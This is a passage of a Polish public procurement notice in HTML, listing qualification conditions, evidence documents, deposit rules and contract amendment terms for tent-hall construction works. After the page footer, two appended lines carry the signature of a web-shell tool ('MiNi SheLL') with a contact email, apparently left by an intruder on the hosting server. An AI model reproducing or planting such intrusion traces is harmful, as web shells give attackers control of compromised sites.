odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) zdolności do występowania w obrocie gospodarczym:Zamawiający nie określa<br/>przedmiotowego warunku.2) uprawnień do prowadzenia określonej działalności gospodarczej<br/>lub zawodowej, o ile wynika to z odrębnych przepisów:Zamawiający nie określa przedmiotowego<br/>warunku.3) sytuacji ekonomicznej lub finansowej:Część I:Warunkiem udziału w postępowaniu<br/>jest posiadanie zdolności kredytowej lub środków finansowych w wysokości co najmniej 400<br/>000,00 zł. Część II:Warunkiem udziału w postępowaniu jest posiadanie zdolności kredytowej lub<br/>środków finansowych w wysokości co najmniej 600 000,00 zł. W przypadku składania ofert na<br/>Część I i Część II zamówienia Wykonawca musi posiadać zdolność kredytową lub środki<br/>finansowe w wysokości co najmniej 1 000 000,00 zł.W przypadku Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia wielkości stanowiące o spełnianiu warunku będą<br/>zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia.Wartości potwierdzające spełnianie warunku podane w dokumentach w<br/>walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP<br/>na dzień wystawienia dokumentu, podając datę i kurs.4) zdolności technicznej lub<br/>zawodowej:Warunkiem udziału w postępowaniu jest:Część I i II:a) wykonanie w sposób należyty<br/>w okresie ostatnich 5 lat liczonych wstecz od dnia, w którym upływa termin składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch robót<br/>budowlanych polegających na budowie namiotowej hali o kubaturze nie mniejszej niż 7 500 m3<br/>każda.W przypadku składania ofert na dwie części zamówienia Wykonawca może wykazać te<br/>same roboty budowlane.W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia Zamawiający wymaga, aby co najmniej dwie roboty budowlane potwierdzające<br/>spełnienie przedmiotowego warunku zostały wykonane przez tego z Wykonawców wspólnie<br/>ubiegających się, który wykona roboty budowlane, do realizacji których te zdolności są<br/>wymagane.W przypadku, gdy Wykonawca w celu potwierdzenia spełniania tego warunku<br/>udziału polega na zdolnościach innego podmiotu Zamawiający wymaga, aby co najmniej dwie<br/>roboty budowlane potwierdzające spełnienie przedmiotowego warunku zostały wykonana przez<br/>ten podmiot, który wykona roboty budowlane, do realizacji których te zdolności są wymagane.b)<br/>dysponowanie osobami skierowanymi przez Wykonawcę do realizacji zamówienia, tj.: 1.<br/>kierownikiem budowy, który musi posiadać:- minimum 5-letnie doświadczenie jako kierownik<br/>budowy,- wymagane uprawnienia o specjalności konstrukcyjno-budowlanej bez ograniczeń,2. kierownikiem robót budowlanych, który musi posiadać:- minimum 3-letnie doświadczenie jako<br/>kierownik robót budowlanych,- wymagane uprawnienia w specjalności konstrukcyjnobudowlanej.<br/>Kierownikiem budowy i kierownikiem robót budowlanych może być ta sama<br/>osoba.3. kierownikiem robót sanitarnych, który musi posiadać:- minimum 3-letnie doświadczenie<br/>jako kierownik robót sanitarnych,- uprawnienia budowlane o specjalności instalacyjnej w<br/>zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i<br/>kanalizacyjnych bez ograniczeń,4. kierownikiem robót elektrycznych, który musi posiadać:-<br/>minimum 3-letnie doświadczenie jako kierownik robót elektrycznych,- wymagane uprawnienia<br/>budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych bez ograniczeń.W przypadku składania ofert na dwie części zamówienia<br/>Wykonawca może wykazać te same osoby.Zgodnie z ustawą z dnia 7 lipca 1994 r. – Prawo<br/>budowlane, samodzielne funkcje techniczne w budownictwie mogą wykonywać wyłącznie osoby<br/>posiadające odpowiednie uprawnienia budowlane, będące członkami właściwych izb samorządu<br/>zawodowego.Wydanie decyzji w sprawie uznania kwalifikacji zawodowych w budownictwie<br/>nabytych w państwach członkowskich UE oraz wpis do stosownej izby odbywa się po<br/>przeprowadzeniu właściwego postępowania weryfikacyjnego przez odpowiedni organ<br/>samorządu zawodowego w Polsce na zasadach określonych w ustawie z dnia 22 grudnia 2015<br/>r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawione nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub<br/>opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że przed<br/>upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;2)<br/>zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń<br/>Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego<br/>Ubezpieczenia Społecznego potwierdzający, że Wykonawca nie zalega z opłacaniem składek na<br/>ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawione nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na<br/>ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem<br/>Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert<br/>Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;3) odpis<br/>lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące<br/>przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;UWAGA: 1.<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast zaświadczenia, o którym mowa w poz. 1) ogłoszenia, zaświadczenia albo innego dokumentu<br/>potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub<br/>zdrowotne, o których mowa w poz. 2) ogłoszenia, lub odpisu albo informacji z Krajowego Rejestru<br/>Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w poz.<br/>3) ogłoszenia - składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma<br/>siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:a) nie naruszył obowiązków<br/>dotyczących płatności podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne,b) nie<br/>otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie<br/>zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się<br/>on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca<br/>wszczęcia tej procedury.2. Dokumenty, o których mowa w pkt 1 UWAGI, powinny być wystawione nie<br/>wcześniej niż 3 miesiące przed ich złożeniem.3. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub<br/>miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1 UWAGI, lub gdy<br/>dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 109 ust. 1 pkt 1 ustawy Pzp, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym<br/>odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub,<br/>jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o<br/>oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem,<br/>organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania Wykonawcy. Przepis pkt 2 stosuje się.4. Powyższe przepisy stosuje się odpowiednio do<br/>podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp mających<br/>siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">oświadczenia i dokumenty składane przez Wykonawców wraz z ofertą:1)<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów<br/>na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że<br/>Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – w<br/>przypadku Wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów;2) oświadczenie, o<br/>którym mowa w art. 117 ust. 4 ustawy Pzp, z którego wynika, które usługi wykonają poszczególni<br/>Wykonawcy – w przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;oświadczenia lub dokumenty, składane przez Wykonawcę na wezwanie Zamawiającego,<br/>potwierdzające spełnianie warunków udziału w postępowaniu:1) informacja banku lub spółdzielczej<br/>kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub<br/>zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;2)<br/>wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączenie<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;3) wykaz osób, skierowanych przez<br/>Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie<br/>usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Część I i II:1. Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości:Część I: 12<br/>000,00 złotych (słownie: dwanaście tysięcy złotych)Część II: 18 000,00 złotych (słownie:<br/>osiemnaście tysięcy złotych)Wadium wnosi się przed upływem terminu składania ofert i<br/>utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o<br/>których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.2. Wadium może być wnoszone<br/>według wyboru Wykonawcy w jednej lub kilku następujących formach:1) pieniądzu;2)<br/>gwarancjach bankowych;3) gwarancjach ubezpieczeniowych;4) poręczeniach udzielanych przez<br/>podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu<br/>Polskiej Agencji Rozwoju Przedsiębiorczości.Wadium wnoszone w pieniądzu należy wpłacić<br/>przelewem na rachunek bankowyNR 95 1020 1811 0000 0902 0334 1138Jeżeli wadium<br/>wnoszone jest w formie gwarancji lub poręczenia, o których mowa w poz. 2)-4), Wykonawca<br/>przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. Plik<br/>(oryginał gwarancji lub poręczenia, w postaci elektronicznej) należy złożyć wraz z ofertą za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na<br/>ePUAP i udostępnionego również na miniPortalu.3. Wadium będzie zwracane na warunkach<br/>określonych w art. 98 ustawy Pzp.4. Zamawiający zatrzyma wadium na warunkach określonych<br/>w art. 98 ust.6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i składają wraz z ofertą<br/>pełnomocnictwo.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą<br/>solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego<br/>wykonania umowy. Szczegółowe informacje dotyczące niepodlegania wykluczeniu, spełniania<br/>warunków udziału w postępowaniu, składania dokumentów i oświadczeń zawarte są w pkt XII,<br/>XVII, XVIII SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) zmiany terminu umownego wykonania zamówienia oraz harmonogramu lub wartości<br/>wynagrodzenia za wykonanie przedmiotu umowy z powodu:- zmiany zakresu robót<br/>wynikających z wprowadzenia zmian istotnych lub nieistotnych w rozumieniu Prawa<br/>budowlanego w dokumentacji projektowej, które wynikły w trakcie realizacji robót i były<br/>konieczne w celu prawidłowej realizacji przedmiotu zamówienia,- konieczności wykonania<br/>dodatkowych badań, ekspertyz, analiz, uzgodnień itp.,- konieczności wykonania robót<br/>wynikających z rozwiązań zamiennych niewykraczających poza zakres przedmiotu zamówienia,<br/>których wykonanie będzie konieczne dla zrealizowania całości robót i uzyskania założonego<br/>efektu użytkowego,- zmiany przepisów, które skutkują zmianą pozwolenia na budowę wydanego<br/>dla realizowanego zamówienia,- konieczności wykonania prac wynikających z zaleceń organów<br/>uprawnionych, np. nadzoru budowlanego itp.,- z powodu nadzwyczajnych zdarzeń<br/>gospodarczych lub okoliczności, których Zamawiający nie mógł przewidzieć w chwili zawarcia<br/>umowy,- działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności (np. przeszkód<br/>atmosferycznych o charakterze katastrof) - nie uważa się za czynnik zakłócający wpływ<br/>czynników atmosferycznych w czasie realizacji przedmiotu zamówienia, który przy składaniu<br/>ofert musi być normalnie brany pod uwagę,2) zmiany wynagrodzenia:a) w przypadku zmiany<br/>stawki podatku od towarów i usług oraz podatku akcyzowego:- zmianie ulegnie kwota<br/>wynagrodzenia brutto określona w § 2 ust. 1 umowy,- zmiana wynagrodzenia nastąpi wyłącznie<br/>w stosunku do niezrealizowanej w dniu zmiany stawki podatku od towarów i usług oraz podatku<br/>akcyzowego części zamówienia,- do określonego w ofercie wynagrodzenia w odniesieniu do<br/>niezrealizowanej części zamówienia zostanie zastosowana obowiązująca na dzień dokonania<br/>zmiany stawka podatku od towarów i usług oraz podatku akcyzowego,- zmiana wynagrodzenia<br/>nastąpi o kwotę wynikającą z różnicy między dotychczasową, a nową stawką podatku od<br/>towarów i usług oraz podatku akcyzowego, b) w przypadku zmiany wysokości minimalnego<br/>wynagrodzenia za pracę, albo wysokości minimalnej stawki godzinowej, ustalonych na<br/>podstawie przepisów ustawy z dnia 10.10.2002 r. o minimalnym wynagrodzeniu za pracę:- jeżeli<br/>zmiany te będą miały wpływ na koszty wykonania przez Wykonawcę przedmiotu umowy, każda ze stron umowy w terminie 30 dni od dnia wejścia w życie przepisów dokonujących tych zmian,<br/>może zwrócić się do drugiej strony o zmianę wynagrodzenia z uwagi na wyżej wymienioną<br/>okoliczność, - obowiązek wykazania zmiany rzeczywiście ponoszonych kosztów z uwagi na<br/>wyżej wymienioną okoliczność należy do strony, która wystąpi z wnioskiem o zmianę<br/>wynagrodzenia, z zastrzeżeniem zapisów pkt 5),- wartość wynagrodzenia ulegnie zmianie o<br/>różnicę w kosztach ponoszonych przez Wykonawcę w odniesieniu do niezrealizowanej części<br/>zamówienia jedynie w przypadku zmiany wynagrodzenia osób, które bezpośrednio wykonują<br/>zamówienie (o kwotę różnicy między kwotą minimalnego wynagrodzenia za pracę albo<br/>minimalnej stawki godzinowej obowiązującej w dniu złożenia oferty, a kwotą minimalnego<br/>wynagrodzenia za pracę albo minimalnej stawki godzinowej wynikającej ze zmienionych<br/>przepisów), z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu<br/>minimalnego wynagrodzenia albo wysokości minimalnej stawki godzinowej), c) w przypadku<br/>zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne:- jeżeli zmiany te będą<br/>miały wpływ na koszty wykonania przez Wykonawcę przedmiotu umowy, każda ze stron umowy<br/>w terminie 30 dni od dnia wejścia w życie przepisów dokonujących tych zmian, może zwrócić się<br/>do drugiej strony o zmianę wynagrodzenia z uwagi na wyżej wymienioną okoliczność, c.d. w sekcji IX <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-17 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">drogą elektroniczną za pośrednictwem: (URL) https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-17 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> c.d. pkt 7.4):- obowiązek wykazania zmiany rzeczywiście ponoszonych kosztów z uwagi na<br/>wyżej wymienioną okoliczność należy do strony, która wystąpi z wnioskiem o zmianę<br/>wynagrodzenia, z zastrzeżeniem zapisów pkt 5),- wartość wynagrodzenia ulegnie zmianie o<br/>różnicę w kosztach ponoszonych przez Wykonawcę w odniesieniu do niezrealizowanej części<br/>zamówienia jedynie o różnicę między kosztami ponoszonymi przez Wykonawcę z tytułu<br/>podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki<br/>składki na ubezpieczenia społeczne lub zdrowotne dotychczas i po zmianie przepisów,d) w<br/>przypadku zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów<br/>kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach<br/>kapitałowych:- jeżeli zmiany te będą miały wpływ na koszty wykonania przez Wykonawcę<br/>przedmiotu umowy, każda ze stron umowy w terminie 30 dni od dnia wejścia w życie przepisów<br/>dokonujących tych zmian, może zwrócić się do drugiej strony o zmianę wynagrodzenia z uwagi<br/>na wyżej wymienioną okoliczność,- obowiązek wykazania zmiany rzeczywiście ponoszonych<br/>kosztów z uwagi na wyżej wymienioną okoliczność należy do strony, która wystąpi z wnioskiem<br/>o zmianę wynagrodzenia, z zastrzeżeniem zapisów pkt 5),- wartość wynagrodzenia ulegnie<br/>zmianie o różnicę w kosztach ponoszonych przez Wykonawcę w odniesieniu do niezrealizowanej części zamówienia jedynie o różnicę między kosztami ponoszonymi przez<br/>Wykonawcę z tytułu gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych<br/>dotychczas i po zmianie,e) w przypadku zwiększenia lub zmniejszenia ilości robót wynikających<br/>z rzeczywistych obmiarów, które powodują zmianę wartości umownej wraz ze zmianą tej<br/>wartości,3) w przypadku zmiany podwykonawców robót w przypadku wystąpienia o zmianę na<br/>wniosek Zamawiającego lub Wykonawcy.4) W przypadku żądania przedłużenia terminu<br/>umownego, w przypadkach o których mowa w pkt 1), zostanie przeprowadzona następująca<br/>procedura:a) Wykonawca prześle Zamawiającemu projekt zmian do umowy (aneks) w terminie<br/>co najmniej 10 dni przed datą upływu terminu zakończenia umowy wraz z pisemnym<br/>uzasadnieniem,b) Zamawiający udzieli pisemnej odpowiedzi lub odeśle podpisany aneks do<br/>umowy przed upływem terminu wykonania umowy.5) W celu dokonania zmian umowy, o których<br/>mowa w pkt 2) lit. b), c) i d) Wykonawca zobowiązany jest wystąpić do Zamawiającego z<br/>pisemnym wnioskiem o zmianę wynagrodzenia, przedkładając odpowiednie kalkulacje i<br/>dokumenty, w tym m.in. kopie umów z osobami, które bezpośrednio wykonują zamówienie,<br/>dokumenty/deklaracje ZUS:a) potwierdzające zasadność i bezpośredni wpływ zaistniałych<br/>zmian na koszty wykonania zamówienia,b) określające stopień w jakim zmiana, o której mowa w<br/>pkt 2) lit. b), c) i d) wpłynie na wysokość wynagrodzenia.6) Strony zobowiązują się do<br/>niezwłocznego, wzajemnego, pisemnego powiadamiania się o zmianach dotyczących<br/>określonych w umowie adresów, bez konieczności sporządzania aneksu do umowy.<br/>Korespondencję doręczoną na adresy wskazane w umowie każda ze stron uzna za<br/>prawidłowo doręczoną w przypadku niepowiadomienia drugiej strony o zmianie swego adresu.<br/>Każda ze stron przyjmuje na siebie odpowiedzialność za wszelkie negatywne skutki wynikłe z<br/>powodu niewskazania drugiej Stronie aktualnego adresu.7) Warunkiem dokonania zmian<br/>postanowień umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności takiej<br/>zmiany w formie aneksu do umowy.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-28 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com